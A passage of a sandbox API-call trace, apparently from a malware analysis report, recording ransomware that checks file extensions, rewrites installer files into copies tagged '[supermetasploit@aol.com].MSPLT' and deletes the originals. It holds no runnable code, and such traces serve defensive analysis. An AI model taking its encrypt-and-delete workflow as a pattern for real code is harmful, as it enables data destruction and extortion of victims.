(lpString1=".1cd", lpString2=".rtf") returned -1 [0169.284] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0169.284] lstrlenW (lpString=".jpg") returned 4 [0169.284] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0169.284] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0169.284] lstrlenW (lpString="LocalizedData.xml") returned 17 [0169.284] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0169.284] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=77232) returned 1 [0169.284] CloseHandle (hObject=0x304) returned 1 [0169.284] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml")) returned 0x80 [0169.284] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0169.288] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0169.288] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0169.288] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0169.288] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0169.289] GetLastError () returned 0x0 [0169.289] ReadFile (in: hFile=0x2fc, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x12db0, lpOverlapped=0x0) returned 1 [0169.300] WriteFile (in: hFile=0x2c0, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x12dc0, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x12dc0, lpOverlapped=0x0) returned 1 [0169.303] ReadFile (in: hFile=0x2fc, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0169.303] WriteFile (in: hFile=0x2c0, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xf6, lpOverlapped=0x0) returned 1 [0169.303] SetEndOfFile (hFile=0x2c0) returned 1 [0169.303] CloseHandle (hObject=0x2c0) returned 1 [0169.306] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0169.306] SetEndOfFile (hFile=0x2fc) returned 1 [0169.308] CloseHandle (hObject=0x2fc) returned 1 [0169.308] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0169.308] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml")) returned 1 [0169.309] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0169.309] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0169.309] lstrlenW (lpString=".doc") returned 4 [0169.309] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0169.309] lstrlenW (lpString=".docx") returned 5 [0169.309] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0169.309] lstrlenW (lpString=".pdf") returned 4 [0169.309] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0169.309] lstrlenW (lpString=".xls") returned 4 [0169.309] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0169.309] lstrlenW (lpString=".xlsx") returned 5 [0169.309] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0169.309] lstrlenW (lpString=".ppt") returned 4 [0169.309] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0169.309] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0169.309] lstrlenW (lpString=".zip") returned 4 [0169.309] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0169.309] lstrlenW (lpString=".rar") returned 4 [0169.309] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0169.310] lstrlenW (lpString=".bz2") returned 4 [0169.310] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0169.310] lstrlenW (lpString=".7z") returned 3 [0169.310] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0169.310] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0169.310] lstrlenW (lpString=".dbf") returned 4 [0169.310] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0169.310] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0169.310] lstrlenW (lpString=".1cd") returned 4 [0169.310] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0169.310] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0169.310] lstrlenW (lpString=".jpg") returned 4 [0169.310] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0169.310] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0169.310] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0169.310] lstrlenW (lpString=".doc") returned 4 [0169.310] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0169.310] lstrlenW (lpString=".docx") returned 5 [0169.310] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0169.310] lstrlenW (lpString=".pdf") returned 4 [0169.310] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0169.310] lstrlenW (lpString=".xls") returned 4 [0169.310] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0169.310] lstrlenW (lpString=".xlsx") returned 5 [0169.310] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0169.311] lstrlenW (lpString=".ppt") returned 4 [0169.311] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0169.311] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0169.311] lstrlenW (lpString=".zip") returned 4 [0169.311] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0169.311] lstrlenW (lpString=".rar") returned 4 [0169.311] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0169.311] lstrlenW (lpString=".bz2") returned 4 [0169.311] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0169.311] lstrlenW (lpString=".7z") returned 3 [0169.311] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0169.311] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0169.311] lstrlenW (lpString=".dbf") returned 4 [0169.311] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0169.311] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0169.311] lstrlenW (lpString=".1cd") returned 4 [0169.311] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0169.311] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0169.311] lstrlenW (lpString=".jpg") returned 4 [0169.311] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0169.311] lstrcmpiW (lpString1=".rtf", lpString2=".MSPLT") returned 1 [0169.312] lstrlenW (lpString="eula.rtf") returned 8 [0169.312] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0169.312] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=3702) returned 1 [0169.312] CloseHandle (hObject=0x2fc) returned 1 [0169.312] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf")) returned 0x80 [0169.312] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0169.312] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0169.312] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0169.312] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0169.313] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0169.907] GetLastError () returned 0x0 [0169.907] ReadFile (in: hFile=0x2fc, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0xe76, lpOverlapped=0x0) returned 1 [0170.228] WriteFile (in: hFile=0x2c0, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xe80, lpOverlapped=0x0) returned 1 [0170.230] ReadFile (in: hFile=0x2fc, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0170.230] WriteFile (in: hFile=0x2c0, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xe4, lpOverlapped=0x0) returned 1 [0170.230] SetEndOfFile (hFile=0x2c0) returned 1 [0170.230] CloseHandle (hObject=0x2c0) returned 1 [0170.232] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0170.232] SetEndOfFile (hFile=0x2fc) returned 1 [0170.232] CloseHandle (hObject=0x2fc) returned 1 [0170.233] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0170.233] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf")) returned 1 [0170.233] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0170.233] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0170.233] lstrlenW (lpString=".doc") returned 4 [0170.233] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0170.233] lstrlenW (lpString=".docx") returned 5 [0170.233] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0170.233] lstrlenW (lpString=".pdf") returned 4 [0170.233] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0170.233] lstrlenW (lpString=".xls") returned 4 [0170.233] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0170.233] lstrlenW (lpString=".xlsx") returned 5 [0170.233] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0170.234] lstrlenW (lpString=".ppt") returned 4 [0170.234] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0170.234] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0170.234] lstrlenW (lpString=".zip") returned 4 [0170.234] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0170.234] lstrlenW (lpString=".rar") returned 4 [0170.234] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0170.234] lstrlenW (lpString=".bz2") returned 4 [0170.234] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0170.234] lstrlenW (lpString=".7z") returned 3 [0170.234] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0170.234] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0170.234] lstrlenW (lpString=".dbf") returned 4 [0170.234] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0170.234] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0170.234] lstrlenW (lpString=".1cd") returned 4 [0170.234] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0170.234] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0170.234] lstrlenW (lpString=".jpg") returned 4 [0170.234] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0170.234] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0170.234] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0170.234] lstrlenW (lpString=".doc") returned 4 [0170.234] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0170.234] lstrlenW (lpString=".docx") returned 5 [0170.234] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0170.234] lstrlenW (lpString=".pdf") returned 4 [0170.234] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0170.234] lstrlenW (lpString=".xls") returned 4 [0170.234] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0170.234] lstrlenW (lpString=".xlsx") returned 5 [0170.234] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0170.234] lstrlenW (lpString=".ppt") returned 4 [0170.234] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0170.235] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0170.235] lstrlenW (lpString=".zip") returned 4 [0170.235] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0170.235] lstrlenW (lpString=".rar") returned 4 [0170.235] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0170.235] lstrlenW (lpString=".bz2") returned 4 [0170.235] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0170.235] lstrlenW (lpString=".7z") returned 3 [0170.235] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0170.235] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0170.235] lstrlenW (lpString=".dbf") returned 4 [0170.235] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0170.235] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0170.235] lstrlenW (lpString=".1cd") returned 4 [0170.235] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0170.235] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0170.235] lstrlenW (lpString=".jpg") returned 4 [0170.235] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0170.235] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0170.235] lstrlenW (lpString="LocalizedData.xml") returned 17 [0170.235] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0170.489] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=86442) returned 1 [0170.489] CloseHandle (hObject=0x2ec) returned 1 [0170.489] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml")) returned 0x80 [0170.489] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0170.489] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0170.489] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0170.489] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0170.490] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0170.490] GetLastError () returned 0x0 [0170.490] ReadFile (in: hFile=0x2ec, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x151aa, lpOverlapped=0x0) returned 1 [0170.537] WriteFile (in: hFile=0x330, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x151b0, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x151b0, lpOverlapped=0x0) returned 1 [0170.542] ReadFile (in: hFile=0x2ec, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0170.542] WriteFile (in: hFile=0x330, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xf6, lpOverlapped=0x0) returned 1 [0170.542] SetEndOfFile (hFile=0x330) returned 1 [0170.542] CloseHandle (hObject=0x330) returned 1 [0170.548] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0170.548] SetEndOfFile (hFile=0x2ec) returned 1 [0170.550] CloseHandle (hObject=0x2ec) returned 1 [0170.550] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0170.551] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml")) returned 1 [0170.551] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0170.551] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0170.551] lstrlenW (lpString=".doc") returned 4 [0170.551] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0170.551] lstrlenW (lpString=".docx") returned 5 [0170.551] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0170.551] lstrlenW (lpString=".pdf") returned 4 [0170.551] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0170.551] lstrlenW (lpString=".xls") returned 4 [0170.552] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0170.552] lstrlenW (lpString=".xlsx") returned 5 [0170.552] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0170.552] lstrlenW (lpString=".ppt") returned 4 [0170.552] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0170.552] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0170.552] lstrlenW (lpString=".zip") returned 4 [0170.552] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0170.552] lstrlenW (lpString=".rar") returned 4 [0170.552] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0170.552] lstrlenW (lpString=".bz2") returned 4 [0170.552] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0170.552] lstrlenW (lpString=".7z") returned 3 [0170.552] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0170.552] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0170.552] lstrlenW (lpString=".dbf") returned 4 [0170.552] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0170.552] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0170.552] lstrlenW (lpString=".1cd") returned 4 [0170.552] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0170.552] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0170.552] lstrlenW (lpString=".jpg") returned 4 [0170.552] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0170.552] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0170.552] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0170.552] lstrlenW (lpString=".doc") returned 4 [0170.553] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0170.553] lstrlenW (lpString=".docx") returned 5 [0170.553] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0170.553] lstrlenW (lpString=".pdf") returned 4 [0170.553] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0170.553] lstrlenW (lpString=".xls") returned 4 [0170.553] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0170.553] lstrlenW (lpString=".xlsx") returned 5 [0170.553] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0170.553] lstrlenW (lpString=".ppt") returned 4 [0170.553] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0170.553] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0170.553] lstrlenW (lpString=".zip") returned 4 [0170.553] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0170.553] lstrlenW (lpString=".rar") returned 4 [0170.553] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0170.553] lstrlenW (lpString=".bz2") returned 4 [0170.553] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0170.553] lstrlenW (lpString=".7z") returned 3 [0170.553] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0170.553] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0170.553] lstrlenW (lpString=".dbf") returned 4 [0170.553] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0170.553] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0170.553] lstrlenW (lpString=".1cd") returned 4 [0170.553] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0170.553] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0170.553] lstrlenW (lpString=".jpg") returned 4 [0170.554] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0170.554] lstrcmpiW (lpString1=".rtf", lpString2=".MSPLT") returned 1 [0170.554] lstrlenW (lpString="eula.rtf") returned 8 [0170.554] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0170.554] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=10125) returned 1 [0170.554] CloseHandle (hObject=0x2ec) returned 1 [0170.554] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf")) returned 0x80 [0170.554] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0170.555] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0170.555] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0170.555] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0170.555] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0170.798] GetLastError () returned 0x0 [0170.798] ReadFile (in: hFile=0x2ec, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x278d, lpOverlapped=0x0) returned 1 [0170.803] WriteFile (in: hFile=0x2f8, 